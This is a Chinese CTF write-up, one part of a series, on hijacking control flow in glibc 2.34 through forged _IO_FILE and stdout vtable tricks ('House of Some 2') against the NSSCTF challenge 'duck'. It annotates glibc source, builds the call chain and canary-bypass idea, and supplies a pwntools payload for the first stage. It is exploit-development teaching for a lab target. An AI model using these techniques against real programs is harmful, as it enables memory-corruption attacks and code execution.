这篇继续libc-2.34_IO_FILE利用,讲一下在_IO_file_jumps不可写的时候应该怎么打,还是以上次的duck为例

题目:https://www.nssctf.cn/problem/2388

调试的libchttps://ftp.gnu.org/gnu/libc/glibc-2.34.tar.gz

回顾与各种House·

上次的笔记vol.3说到,在libc-2.34(或者更高版本的libc)中已经不能用free_hook去做控制流劫持,新的利用方法是去打_IO_FILE

笔记vol.3的最后说到,因为题目duck_IO_file_jumps是可写的,所以可以修改_IO_file_jumps__overflow指针为想要调用的函数,然后调用puts函数触发_IO_OVERFLOW,最终劫持控制流

但正常情况下,_IO_file_jumps是一个const变量,即不可写的变量,所以只是因为出题人故意降低难度才能用这样的方法

而且因为IO_validate_vtable的检查存在,所以也不能去把vtable指向我伪造的_IO_jump_t结构体

那么该怎么打呢,网上搜以下可以找到各种奇奇怪怪的House,这里列举几个比较新/出名的

其中House of apple 1~3house of some 1都是用的exit的链(他们介绍中是这样说的,至于能不能转到别的入口就有空再研究一下,留个坑),而house of some 2用的是puts的链

根据上次的分析,因为题目的程序不会退出,所以就不适合用exit的链,于是下面就讲一下怎么用house of some 2去打吧

House of Some 2·

先来讲讲理论部分,在 @Csome 的博客上面也有挺详细的介绍了,这里复述一下

Part.1 一切的入口·

先来看看_IO_wfile_underflow_maybe_mmap这个函数,在libio/wfileops.c

1
2
3
4
5
6
7
8
9
10
11
static wint_t
_IO_wfile_underflow_maybe_mmap (FILE *fp)
{
/* This is the first read attempt. Doing the underflow will choose mmap
or vanilla operations and then punt to the chosen underflow routine.
Then we can punt to ours. */
if (_IO_file_underflow_maybe_mmap (fp) == EOF)
return WEOF;

return _IO_WUNDERFLOW (fp);
}

调用了_IO_file_underflow_maybe_mmap_IO_WUNDERFLOW

追进_IO_file_underflow_maybe_mmap,在libio/fileops.c

1
2
3
4
5
6
7
8
int
_IO_file_underflow_maybe_mmap (FILE *fp)
{
/* This is the first read attempt. Choose mmap or vanilla operations
and then punt to the chosen underflow routine. */
decide_maybe_mmap (fp);
return _IO_UNDERFLOW (fp);
}

调用了decide_maybe_mmap_IO_UNDERFLOW

继续追进decide_maybe_mmap,在libio/fileops.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
static void
decide_maybe_mmap (FILE *fp)
{
/* We use the file in read-only mode. This could mean we can
mmap the file and use it without any copying. But not all
file descriptors are for mmap-able objects and on 32-bit
machines we don't want to map files which are too large since
this would require too much virtual memory. */
struct __stat64_t64 st;

if (_IO_SYSSTAT (fp, &st) == 0 // <=
&& S_ISREG (st.st_mode) && st.st_size != 0
/* Limit the file size to 1MB for 32-bit machines. */
&& (sizeof (ptrdiff_t) > 4 || st.st_size < 1*1024*1024)
/* Sanity check. */
&& (fp->_offset == _IO_pos_BAD || fp->_offset <= st.st_size))
{
/* Try to map the file. */
void *p;

p = __mmap64 (NULL, st.st_size, PROT_READ, MAP_SHARED, fp->_fileno, 0);
if (p != MAP_FAILED)
{
/* OK, we managed to map the file. Set the buffer up and use a
special jump table with simplified underflow functions which
never tries to read anything from the file. */

if (__lseek64 (fp->_fileno, st.st_size, SEEK_SET) != st.st_size)
{
(void) __munmap (p, st.st_size);
fp->_offset = _IO_pos_BAD;
}
else
{
_IO_setb (fp, p, (char *) p + st.st_size, 0);

if (fp->_offset == _IO_pos_BAD)
fp->_offset = 0;

_IO_setg (fp, p, p + fp->_offset, p + st.st_size);
fp->_offset = st.st_size;

if (fp->_mode <= 0)
_IO_JUMPS_FILE_plus (fp) = &_IO_file_jumps_mmap;
else
_IO_JUMPS_FILE_plus (fp) = &_IO_wfile_jumps_mmap;
fp->_wide_data->_wide_vtable = &_IO_wfile_jumps_mmap;

return;
}
}
}

/* We couldn't use mmap, so revert to the vanilla file operations. */

if (fp->_mode <= 0)
_IO_JUMPS_FILE_plus (fp) = &_IO_file_jumps; // <=
else
_IO_JUMPS_FILE_plus (fp) = &_IO_wfile_jumps;
fp->_wide_data->_wide_vtable = &_IO_wfile_jumps; // <=
}

重点关注中间调用了_IO_SYSSTAT (fp, &st),还有最后几步做了vtable_wide_vtable的恢复,把vtable恢复为_IO_file_jumps,把_wide_vtable恢复为_IO_wfile_jumps

_IO_SYSSTAT (fp, &st)是一个很特别的调用,因为st是一个栈上的参数,所以&st相当于把一个栈上的地址作为入参传给_IO_SYSSTAT,这样就有机会通过_IO_SYSSTAT指向的函数泄露栈地址,或者控制栈

先来把以上这些串起来,会得到这样的几层调用

1
2
3
4
5
6
7
_IO_wfile_underflow_maybe_mmap (FILE *fp)
> _IO_file_underflow_maybe_mmap (fp)
==> decide_maybe_mmap (fp)
====> _IO_SYSSTAT (fp, &st)
====> // revert vtable and _wide_vtable
==> _IO_UNDERFLOW (fp)
> _IO_WUNDERFLOW (fp)

这里从上帝视角来看一下,我假设_IO_SYSSTAT (fp, &st)一定可以打成功,那么就需要通过puts函数调用_IO_wfile_underflow_maybe_mmap

参考笔记vol.3puts函数里面会通过stdout调用_IO_file_jumps_IO_sputn

再来看看_IO_wfile_underflow_maybe_mmap所在的_IO_jump_t结构,是libio/wfileops.c:1073_IO_wfile_underflow_maybe_mmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
const struct _IO_jump_t _IO_wfile_jumps_maybe_mmap libio_vtable =
{
JUMP_INIT_DUMMY,
JUMP_INIT(finish, _IO_new_file_finish),
JUMP_INIT(overflow, (_IO_overflow_t) _IO_wfile_overflow),
JUMP_INIT(underflow, (_IO_underflow_t) _IO_wfile_underflow_maybe_mmap), // <=
JUMP_INIT(uflow, (_IO_underflow_t) _IO_wdefault_uflow),
JUMP_INIT(pbackfail, (_IO_pbackfail_t) _IO_wdefault_pbackfail),
JUMP_INIT(xsputn, _IO_wfile_xsputn),
JUMP_INIT(xsgetn, _IO_file_xsgetn),
JUMP_INIT(seekoff, _IO_wfile_seekoff),
JUMP_INIT(seekpos, _IO_default_seekpos),
JUMP_INIT(setbuf, _IO_file_setbuf_mmap),
JUMP_INIT(sync, (_IO_sync_t) _IO_wfile_sync),
JUMP_INIT(doallocate, _IO_wfile_doallocate),
JUMP_INIT(read, _IO_file_read),
JUMP_INIT(write, _IO_new_file_write),
JUMP_INIT(seek, _IO_file_seek),
JUMP_INIT(close, _IO_file_close),
JUMP_INIT(stat, _IO_file_stat),
JUMP_INIT(showmanyc, _IO_default_showmanyc),
JUMP_INIT(imbue, _IO_default_imbue)
};

观察可得,上面的underflowxsputn相差了3个指针,在64位的机器中,一个指针是8字节,也就是相差了0x18个字节

所以这里如果我要用puts去调用_IO_wfile_underflow_maybe_mmap的话,可以把stdoutvtable指向&_IO_wfile_jumps_maybe_mmap - 0x18,这样stdout.vtable->__xsputn就会指向_IO_wfile_jumps_maybe_mmap->__underflow,也就是_IO_wfile_underflow_maybe_mmap

1
stdout.vtable = &_IO_wfile_jumps_maybe_mmap - 0x18

而且&_IO_wfile_jumps_maybe_mmap - 0x18是一个合法的地址,可以通过IO_validate_vtable的检查

Part.2 利用_IO_SYSREAD实现循环调用·

先看一下这样修改后会发生什么事

在把stdoutvtable改成&_IO_wfile_jumps_maybe_mmap - 0x18后,原来的stat也会跟着偏移,变成write,也就是会调用_IO_new_file_write,可以直接把这东西看成是write函数,fdstdout_fileno

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
ssize_t
_IO_new_file_write (FILE *f, const void *data, ssize_t n)
{
ssize_t to_do = n;
while (to_do > 0)
{
ssize_t count = (__builtin_expect (f->_flags2
& _IO_FLAGS2_NOTCANCEL, 0)
? __write_nocancel (f->_fileno, data, to_do)
: __write (f->_fileno, data, to_do));
if (count < 0)
{
f->_flags |= _IO_ERR_SEEN;
break;
}
to_do -= count;
data = (void *) ((char *) data + count);
}
n -= to_do;
if (f->_offset >= 0)
f->_offset += n;
return n;
}

然后在decide_maybe_mmap的最后会恢复vtable_wide_vtable,也就是说_IO_UNDERFLOW就是调用的是_IO_file_jumps_IO_file_underflow_IO_WUNDERFLOW调用的是_IO_wfile_jumps_IO_wfile_underflow

那么理论上原来的几层调用就会变成

1
2
3
4
5
6
7
8
_IO_puts (const char *str)
>_IO_wfile_underflow_maybe_mmap (stdout)
==> _IO_file_underflow_maybe_mmap (stdout)
====> decide_maybe_mmap (stdout)
======> write (stdout.file._fileno, &st, ??) // _IO_SYSSTAT
======> // revert vtable and _wide_vtable
====> _IO_file_underflow (stdout) // _IO_UNDERFLOW
==> _IO_wfile_underflow (stdout) // _IO_WUNDERFLOW

这里因为原来的_IO_SYSSTAT (fp, &st)只有两个参数,所以write的第三个参数(也就是write的大小)大概率会不可控,但这里先不管这个

先来看看_IO_file_underflow干了什么,在libio/fileops.c:460

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
int
_IO_new_file_underflow (FILE *fp)
{
ssize_t count;

/* C99 requires EOF to be "sticky". */
if (fp->_flags & _IO_EOF_SEEN)
return EOF;

if (fp->_flags & _IO_NO_READS)
{
fp->_flags |= _IO_ERR_SEEN;
__set_errno (EBADF);
return EOF;
}
if (fp->_IO_read_ptr < fp->_IO_read_end)
return *(unsigned char *) fp->_IO_read_ptr;

if (fp->_IO_buf_base == NULL)
{
/* Maybe we already have a push back pointer. */
if (fp->_IO_save_base != NULL)
{
free (fp->_IO_save_base);
fp->_flags &= ~_IO_IN_BACKUP;
}
_IO_doallocbuf (fp);
}

/* FIXME This can/should be moved to genops ?? */
if (fp->_flags & (_IO_LINE_BUF|_IO_UNBUFFERED))
{
/* We used to flush all line-buffered stream. This really isn't
required by any standard. My recollection is that
traditional Unix systems did this for stdout. stderr better
not be line buffered. So we do just that here
explicitly. --drepper */
_IO_acquire_lock (stdout);

if ((stdout->_flags & (_IO_LINKED | _IO_NO_WRITES | _IO_LINE_BUF))
== (_IO_LINKED | _IO_LINE_BUF))
_IO_OVERFLOW (stdout, EOF);

_IO_release_lock (stdout);
}

_IO_switch_to_get_mode (fp);

/* This is very tricky. We have to adjust those
pointers before we call _IO_SYSREAD () since
we may longjump () out while waiting for
input. Those pointers may be screwed up. H.J. */
fp->_IO_read_base = fp->_IO_read_ptr = fp->_IO_buf_base;
fp->_IO_read_end = fp->_IO_buf_base;
fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_write_end
= fp->_IO_buf_base;

count = _IO_SYSREAD (fp, fp->_IO_buf_base, // <=
fp->_IO_buf_end - fp->_IO_buf_base);
if (count <= 0)
{
if (count == 0)
fp->_flags |= _IO_EOF_SEEN;
else
fp->_flags |= _IO_ERR_SEEN, count = 0;
}
fp->_IO_read_end += count;
if (count == 0)
{
/* If a stream is read to EOF, the calling application may switch active
handles. As a result, our offset cache would no longer be valid, so
unset it. */
fp->_offset = _IO_pos_BAD;
return EOF;
}
if (fp->_offset != _IO_pos_BAD)
_IO_pos_adjust (fp->_offset, count);
return *(unsigned char *) fp->_IO_read_ptr;
}
libc_hidden_ver (_IO_new_file_underflow, _IO_file_underflow)

挺长的,重点关注中间调用了

1
count = _IO_SYSREAD (fp, fp->_IO_buf_base, fp->_IO_buf_end - fp->_IO_buf_base);

也就是_IO_file_jumps_IO_file_read

1
2
3
4
5
6
7
8
ssize_t
_IO_file_read (FILE *fp, void *buf, ssize_t size)
{
return (__builtin_expect (fp->_flags2 & _IO_FLAGS2_NOTCANCEL, 0)
? __read_nocancel (fp->_fileno, buf, size)
: __read (fp->_fileno, buf, size));
}
libc_hidden_def (_IO_file_read)

大概可以理解为调用了read函数,fdstdout_fileno

1
read(stdout.file._fileno, stdout.file._IO_buf_base, stdout.file._IO_buf_end - stdout.file._IO_buf_base)

因为前面的uaf可以控制stdout.file,所以这三个参数都能控制,所以就可以往任意地方写东西

1
2
3
stdout.file._fileno      = 0
stdout.file._IO_buf_base = &buf
stdout.file._IO_buf_end = &buf + n

就可以调用

1
read(0, &buf, n)

问题是,写什么呢

如果在前面的write (stdout.file._fileno, &st, ??)中,第三个参数足够大的话,就有可能泄露栈地址,这样的话就可以往栈上写rop,实现栈溢出

但到这里rdx的概率其实挺小的,实际测试也不大,就是不能泄露栈的地址

继续观察,在后面还有一个_IO_WUNDERFLOW (fp)的调用,那么如果让_IO_SYSREAD再一次去写stdout,只要长度足够,就可以写三样东西:

  1. stdout.file的各个参数,用来修改入参和绕过各种条件
  2. stdout.filestruct _IO_wide_data *_wide_data,把这个指针指向伪造的struct _IO_wide_data结构,就可以改_IO_WIDE_JUMPS对应的_wide_vtable
  3. stdoutvtable,这个先接着往下看

首先修改stdout.file._wide_data->_wide_vtable,就可以让_IO_WUNDERFLOW去调用任意函数,struct _IO_wide_data的定义在libio/libio.h

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
/* Extra data for wide character streams.  */
struct _IO_wide_data
{
wchar_t *_IO_read_ptr; /* Current read pointer */
wchar_t *_IO_read_end; /* End of get area. */
wchar_t *_IO_read_base; /* Start of putback+get area. */
wchar_t *_IO_write_base; /* Start of put area. */
wchar_t *_IO_write_ptr; /* Current put pointer. */
wchar_t *_IO_write_end; /* End of put area. */
wchar_t *_IO_buf_base; /* Start of reserve area. */
wchar_t *_IO_buf_end; /* End of reserve area. */
/* The following fields are used to support backing up and undo. */
wchar_t *_IO_save_base; /* Pointer to start of non-current get area. */
wchar_t *_IO_backup_base; /* Pointer to first valid character of
backup area */
wchar_t *_IO_save_end; /* Pointer to end of non-current get area. */

__mbstate_t _IO_state;
__mbstate_t _IO_last_state;
struct _IO_codecvt _codecvt;

wchar_t _shortbuf[1];

const struct _IO_jump_t *_wide_vtable; // <=
};

#define _IO_WIDE_JUMPS(THIS) \
_IO_CAST_FIELD_ACCESS ((THIS), struct _IO_FILE, _wide_data)->_wide_vtable

#define _IO_WIDE_JUMPS_FUNC(THIS) _IO_WIDE_JUMPS(THIS)

#define WJUMP0(FUNC, THIS) (_IO_WIDE_JUMPS_FUNC(THIS)->FUNC) (THIS)
#define WJUMP1(FUNC, THIS, X1) (_IO_WIDE_JUMPS_FUNC(THIS)->FUNC) (THIS, X1)
#define WJUMP2(FUNC, THIS, X1, X2) (_IO_WIDE_JUMPS_FUNC(THIS)->FUNC) (THIS, X1, X2)
#define WJUMP3(FUNC, THIS, X1,X2,X3) (_IO_WIDE_JUMPS_FUNC(THIS)->FUNC) (THIS, X1,X2, X3)

PS:有一点小细节是,_IO_WIDE_JUMPS_FUNC并不像_IO_JUMPS_FUNC那样有IO_validate_vtable的检查,所以其实可以把_wide_vtable指向我自己伪造的_IO_jump_t结构,但 @CSOME 的意思是,未来这个检查可能会被修复,所以下面就假设_IO_WIDE_JUMPS_FUNC也会有检查来打

到这里我还是想去打_IO_SYSSTAT (fp, &st),而要继续触发这个的话,就只能把_IO_WUNDERFLOW指回_IO_wfile_underflow_maybe_mmap,也就相当于设置

1
stdout.file._wide_data->_wide_vtable = &_IO_wfile_jumps_maybe_mmap

那么调用就会变成

1
2
3
4
5
6
7
8
9
_IO_puts (const char *str)
>_IO_wfile_underflow_maybe_mmap (stdout) // loop
==> _IO_file_underflow_maybe_mmap (stdout)
====> decide_maybe_mmap (stdout)
======> write (stdout.file._fileno, &st, ??) // _IO_SYSSTAT
======> // revert vtable and _wide_vtable
====> _IO_file_underflow (stdout) // _IO_UNDERFLOW
======> read(0, &_IO_2_1_stdout_, n) // modify _wide_vtable
==> _IO_wfile_underflow_maybe_mmap (stdout) // _IO_WUNDERFLOW

相当于实现了一个循环调用

Part.3 利用_IO_SYSSTAT调用任意vtable函数·

再来看看修改vtable可以怎么利用

在上面形成循环后,就可以嵌套

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
// entrance
_IO_puts (const char *str)
> _IO_wfile_underflow_maybe_mmap (stdout) // loop
==> _IO_file_underflow_maybe_mmap (stdout)
====> decide_maybe_mmap (stdout)
======> write (stdout.file._fileno, &st, ??) // _IO_SYSSTAT
======> // revert vtable and _wide_vtable
====> _IO_file_underflow (stdout) // _IO_UNDERFLOW
======> read(0, &_IO_2_1_stdout_, n0) // modify _wide_vtable
==> _IO_wfile_underflow_maybe_mmap (stdout) // _IO_WUNDERFLOW
// first loop
====> _IO_file_underflow_maybe_mmap (stdout)
======> decide_maybe_mmap (stdout)
========> _IO_SYSSTAT (stdout, &st, ??) // arbitrary _IO_jump_t function
========> // revert vtable and _wide_vtable
======> _IO_file_underflow (stdout) // _IO_UNDERFLOW
========> read(0, &_IO_2_1_stdout_, n1) // modify _wide_vtable
====> _IO_wfile_underflow_maybe_mmap (stdout) // _IO_WUNDERFLOW

也就是通过修改vtable,可以让其中的_IO_SYSSTAT调用任意_IO_jump_t结构的函数

这里先举个栗子,假设我想通过read去覆盖&st之后栈上的返回地址,那么我就可以让_IO_SYSSTAT指向_IO_file_read,也就是

1
stdout.vtable = &_IO_file_jumps - 0x20

那么上面的_IO_SYSSTAT (stdout, &st, ??)就是调用

1
_IO_file_read(stdout, &st, ??)

在里面也就会调用

1
read(stdout.file._fileno, &st, ??)

到这里有个比较麻烦的事是,read函数有三个参数,而正常的_IO_SYSSTAT只有两个参数,所以这里的第三个参数,也就是写的字节长度并不能控制

于是 @CSOME 就做了个假设,还记得在入口的时候做了一次

1
read(0, &_IO_2_1_stdout_, n)

这里的第三个参数是可以控制的

1
n = stdout.file._IO_buf_end - stdout.file._IO_buf_base

那么假设在这次read到我第一次循环中调用_IO_SYSSTAT的时候,寄存器rdx都没有被动过的话,呢么到我调用_IO_SYSSTAT的时候,rdx都还是这个n,也就可以控制第三个参数,相当于调用了

1
_IO_SYSSTAT (stdout, &st, n)

这是一个挺强的假设,因为rdx是一个挺常用的寄存器,但按照 @CSOME 的说法,高版本的libc为了提高rop的难度,会减少rdx寄存器的使用

额,暂时就信他一下吧,反正我用题目的给的libc是打不通的

自己编译的libc的话,优化至少要开到O3以上才能打(看偏移估计题目给的是O2),O2以下都会有一个绕不过的地方把rdx改成不可利用的值,这个后面讲题目的时候再说

Part.4 绕过Canary·

即使假设rdx可以被控制,这里也还有一个问题,就是覆盖&st之后栈上的返回地址时,并不知道canary

而且这里也不能通过write之类的函数去泄露canary,因为在这个循环中需要设置

1
stdout.file._fileno = 0

这样才能保证能够进入下一次循环,也就是在泄露canary后再去用read覆盖栈

而调用write输出的话需要_fileno = 1

PS:我自己编译的libc上好像并没有canary的这个东西,原理未明,不知道是不是跟编译参数有关,如果题目给的libc也没有的话,这里就可以直接用read去打,下面讲的时有canary的情况

于是鬼才 @Csome 就搞了个用_IO_default_xsputn_IO_default_xsgetn移栈的方法

_IO_default_xsputn·

先来看看_IO_default_xsputn函数,在libio/strops.c_IO_str_jumpslibio/opvsprintf.c_IO_str_chk_jumps中被用到,定义在libio/genops.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
size_t
_IO_default_xsputn (FILE *f, const void *data, size_t n)
{
const char *s = (char *) data;
size_t more = n;
if (more <= 0)
return 0;
for (;;)
{
/* Space available. */
if (f->_IO_write_ptr < f->_IO_write_end)
{
size_t count = f->_IO_write_end - f->_IO_write_ptr;
if (count > more)
count = more;
if (count > 20)
{
f->_IO_write_ptr = __mempcpy (f->_IO_write_ptr, s, count); // <=
s += count;
}
else if (count)
{
char *p = f->_IO_write_ptr;
ssize_t i;
for (i = count; --i >= 0; )
*p++ = *s++;
f->_IO_write_ptr = p;
}
more -= count;
}
if (more == 0 || _IO_OVERFLOW (f, (unsigned char) *s++) == EOF)
break;
more--;
}
return n - more;
}
libc_hidden_def (_IO_default_xsputn)

主要关注其中的

1
__mempcpy (f->_IO_write_ptr, s, count)

如果能到这里也就能实现

1
mempcpy(stdout.file._IO_write_ptr, &st, stdout.file._IO_write_end - stdout.file._IO_write_ptr)

也就是可以把&ststdout.file._IO_write_end- stdout.file._IO_write_ptr个字节复制到stdout.file._IO_write_ptr指向的地方

于是就可以实现把栈复制到一个我指定的地方

接着往下看,有一个

1
if (more == 0 || _IO_OVERFLOW (f, (unsigned char) *s++) == EOF)

这里因为stdoutvtable已经被改过,所以_IO_OVERFLOW其实并不是_IO_file_overflow,就有可能会崩

先看能不能让more == 0为真,把后面的截断

看一下这里more = rdxmore - count == 0,其实就是要

1
count = stdout.file._IO_write_end - stdout.file._IO_write_ptr == rdx

rdx_IO_default_xsputn的第三个参数,如果通过让_IO_SYSSTAT指向_IO_default_xsputn的方式来调用的话,那么根据上面的假设,就是上一次的stdout.file._IO_buf_end - stdout.file._IO_buf_base

也就是这次调用_IO_SYSSTATstdout.file._IO_write_end - stdout.file._IO_write_ptr等于上一次调用_IO_SYSSTATstdout.file._IO_buf_end - stdout.file._IO_buf_base就可以绕过这里的if条件

_IO_default_xsgetn·

_IO_default_xsgetn差不多是_IO_default_xsputn的逆操作,先看源码,也在libio/genops.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
size_t
_IO_default_xsgetn (FILE *fp, void *data, size_t n)
{
size_t more = n;
char *s = (char*) data;
for (;;)
{
/* Data available. */
if (fp->_IO_read_ptr < fp->_IO_read_end)
{
size_t count = fp->_IO_read_end - fp->_IO_read_ptr;
if (count > more)
count = more;
if (count > 20)
{
s = __mempcpy (s, fp->_IO_read_ptr, count); // <=
fp->_IO_read_ptr += count;
}
else if (count)
{
char *p = fp->_IO_read_ptr;
int i = (int) count;
while (--i >= 0)
*s++ = *p++;
fp->_IO_read_ptr = p;
}
more -= count;
}
if (more == 0 || __underflow (fp) == EOF)
break;
}
return n - more;
}
libc_hidden_def (_IO_default_xsgetn)

重点关注其中的

1
__mempcpy (s, fp->_IO_read_ptr, count)

到这里就相当于实现了

1
mempcpy(&st, stdout.file._IO_read_ptr, stdout.file._IO_read_end - stdout.file._IO_read_ptr)

也就是可以把stdout.file._IO_read_ptr指向的stdout.file._IO_read_end - stdout.file._IO_read_ptr个字节复制回&st

于是就可以把一段我指定的内容复制回栈上

同样这里也有一个__underflow的调用可能需要绕过

1
if (more == 0 || __underflow (fp) == EOF)

也就可能需要

1
count = stdout.file._IO_read_end - stdout.file._IO_read_ptr = rdx

即这次调用_IO_SYSSTATstdout.file._IO_read_end - stdout.file._IO_read_ptr等于上一次调用_IO_SYSSTATstdout.file._IO_buf_end - stdout.file._IO_buf_base

PS:这一步其实有一点不太完美的地方是要设置_IO_read_ptr_IO_read_end,而在_IO_file_underflow_IO_SYSREAD之前有一个这样的检查

1
2
if (fp->_IO_read_ptr < fp->_IO_read_end)
return *(unsigned char *) fp->_IO_read_ptr;

也就是如果要执行_IO_default_xsgetn的话这个检查是绕不过去的,即不能在后面继续做循环

不过既然rop都写上去了,结束循环也没啥问题

如何写栈·

_IO_default_xsputn_IO_default_xsgetn结合起来,就可以实现

  1. 通过_IO_default_xsputn&st后面的内容复制到一个我可控的地方
  2. 在复制的栈上绕过canary写返回地址,或者泄露canary
  3. 通过_IO_default_xsgetn把修改后的栈复制回&st

那么调用就变成了两次循环,然后到rop

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
// entrance
_IO_puts (const char *str)
> _IO_wfile_underflow_maybe_mmap (stdout) // loop
==> _IO_file_underflow_maybe_mmap (stdout)
====> decide_maybe_mmap (stdout)
======> write (stdout.file._fileno, &st, ??) // _IO_SYSSTAT
======> // revert vtable and _wide_vtable
====> _IO_file_underflow (stdout) // _IO_UNDERFLOW
======> read(0, &_IO_2_1_stdout_, n0) // modify _wide_vtable
==> _IO_wfile_underflow_maybe_mmap (stdout) // _IO_WUNDERFLOW
// first loop
====> _IO_file_underflow_maybe_mmap (stdout)
======> decide_maybe_mmap (stdout)
========> _IO_default_xsputn (stdout, &st, rdx)
==========> __mempcpy (_IO_write_ptr, &st, count) // copy &st to _IO_write_ptr
========> // revert vtable and _wide_vtable
======> _IO_file_underflow (stdout) // _IO_UNDERFLOW
========> read(0, &_IO_2_1_stdout_, n1) // modify _wide_vtable
====> _IO_wfile_underflow_maybe_mmap (stdout) // _IO_WUNDERFLOW
// second loop
======> _IO_file_underflow_maybe_mmap (stdout)
========> decide_maybe_mmap (stdout)
==========> _IO_default_xsgetn (stdout, &st, rdx)
============> __mempcpy (&sts, _IO_read_ptr, count) // copy &st to _IO_write_ptr
==========> // revert vtable and _wide_vtable
========> _IO_file_underflow (stdout) // _IO_UNDERFLOW
==========> // pass _IO_SYSREAD
========> // return to rop
======> rop

duck(O3)·

理论是理论,实际打的话有些细节还是会不一样的

看回duck这题,有几点和 @CSOME 说的条件不一样

  1. 这题的库是libc-2.34,而不是libc-2.35以上
  2. 这题的库是出题人自己编译的,而不是Ubuntu GLIBC 2.**

直接说结论的话,就是直接用题目的libc打不了,如果自己用O3以上优化编译一个libc的话就可以打,但跟纯血的House of Some 2会有差别

下面就说一下我在libc-2.34-O3上打的时候会有什么差别,顺便说一下House of Some 2的一些细节

首先给一个我编好的库:libc-2.34-debug-O3.zip

或者也可以自己编译,编译方法可以参考这里,编译命令(注意/path/to/glibc-2.34/x64改成你自己的glibc-2.34/x64位置)

1
2
3
4
5
6
7
8
mkdir build x64
cd build
CC="gcc" CXX="g++" \
CFLAGS="-g -g3 -ggdb -gdwarf-4 -O3 -Wno-error" \
CXXFLAGS="-g -g3 -ggdb -gdwarf-4 -O3 -Wno-error" \
../configure --prefix=/path/to/glibc-2.34/x64 --disable-werror
make -j8
make install

Part.1 入口·

笔记vol.3中,已经实现了heap_baselibc_base的泄露,同时也可以往任意地址写0x100个字节

那么按House of Some 2的做法,之后应该要去写_IO_2_1_stdout_,而 _IO_2_1_stdout_的大小是0xe0,所以刚好够写

接下来看看具体需要写什么

首先,我们需要让puts函数进入_IO_wfile_underflow_maybe_mmap,那么就是让_IO_XSPUTN 指向_IO_wfile_underflow_maybe_mmap,即让_IO_2_1_stdout_vtable指向&_IO_wfile_jumps_maybe_mmap - 0x18

然后进到decide_maybe_mmap中,需要让以下if条件为假

1
2
3
4
5
6
if (_IO_SYSSTAT (fp, &st) == 0
&& S_ISREG (st.st_mode) && st.st_size != 0
/* Limit the file size to 1MB for 32-bit machines. */
&& (sizeof (ptrdiff_t) > 4 || st.st_size < 1*1024*1024)
/* Sanity check. */
&& (fp->_offset == _IO_pos_BAD || fp->_offset <= st.st_size))

这让才能避免程序在if中被return,不然会跳过vtable_wide_vtable的恢复

我自己测试,在_IO_SYSSTAT被改掉的情况下这个if是大概率不满足的,如果实在不行的话可以去设置(fp->_offset == _IO_pos_BAD || fp->_offset <= st.st_size)为假

接着在恢复vtable_wide_vtable时,需要让vtable指向_IO_file_jumps,所以需要设置_mode <= 0

1
2
3
4
5
if (fp->_mode <= 0)
_IO_JUMPS_FILE_plus (fp) = &_IO_file_jumps;
else
_IO_JUMPS_FILE_plus (fp) = &_IO_wfile_jumps;
fp->_wide_data->_wide_vtable = &_IO_wfile_jumps;

而且关注fp->_wide_data->_wide_vtable这一句,需要_wide_data指向一个可以写的地址,不然这句会报错

PS:这里也可以顺便把_wide_data指向伪造的struct _IO_wide_data结构,但这需要更大长度的任意写,这题的0x100时不够的,而且后面一步也可以写,所以意义不大

最后在_IO_file_underflow中调用read时,需要_fileno0

1
2
count = _IO_SYSREAD (fp, fp->_IO_buf_base,
fp->_IO_buf_end - fp->_IO_buf_base);

写的地址是_IO_2_1_stdout_,所以_IO_buf_base指向_IO_2_1_stdout_

写的长度是_IO_2_1_stdout_struct _IO_wide_data结构的大小,即0x1c8,所以_IO_buf_end设置为_IO_buf_base + 0x1c8

参考的payload

1
2
3
4
5
6
7
8
9
10
11
12
payload1 = flat({
0x00: 0x8000, # _IO_USER_LOCK > disable lock
0x38: libc_stdout, # _IO_buf_base > read buf
0x40: libc_stdout + 0x1c8, # _IO_buf_end > read nbytes 0x1c8,
# size of _IO_FILE_plus + _IO_wide_data
0x70: 0, # _fileno > read fd, stdin
0xa0: libc_stdout + 0x100, # _wide_data > writable address,
# or corrupt in fileops.c:717,
# decide_maybe_mmap: fp->_wide_data->_wide_vtable = &_IO_wfile_jumps;
0xc0: 0, # _mode < 0
0xd8: libc_IO_wfile_jumps_maybe_mmap - 0x18, # vtable
}, filler=b"\x00")

Part.2 第一次循环·

控制第一次循环的payload在入口的read中输入,下面看看要输入些啥

按照上面假设有canary的话,第一次循环的目的是为了执行_IO_default_xsputn

先来说说用原来题目的libc库时的一个问题,还记得在调用vtable的函数时都会有一个IO_validate_vtable检查

1
2
3
4
5
6
7
8
9
10
11
12
13
14
static inline const struct _IO_jump_t *
IO_validate_vtable (const struct _IO_jump_t *vtable)
{
/* Fast path: The vtable pointer is within the __libc_IO_vtables
section. */
uintptr_t section_length = __stop___libc_IO_vtables - __start___libc_IO_vtables;
uintptr_t ptr = (uintptr_t) vtable;
uintptr_t offset = ptr - (uintptr_t) __start___libc_IO_vtables;
if (__glibc_unlikely (offset >= section_length))
/* The vtable pointer is not in the expected section. Use the
slow path, which will terminate the process if necessary. */
_IO_vtable_check ();
return vtable;
}

其中有一步是

1
uintptr_t section_length = __stop___libc_IO_vtables - __start___libc_IO_vtables

在我自己编译libc把优化开到O2以下时,发现执行这一句的汇编都是

1
lea    rdx, [rip + 0x170dd8]

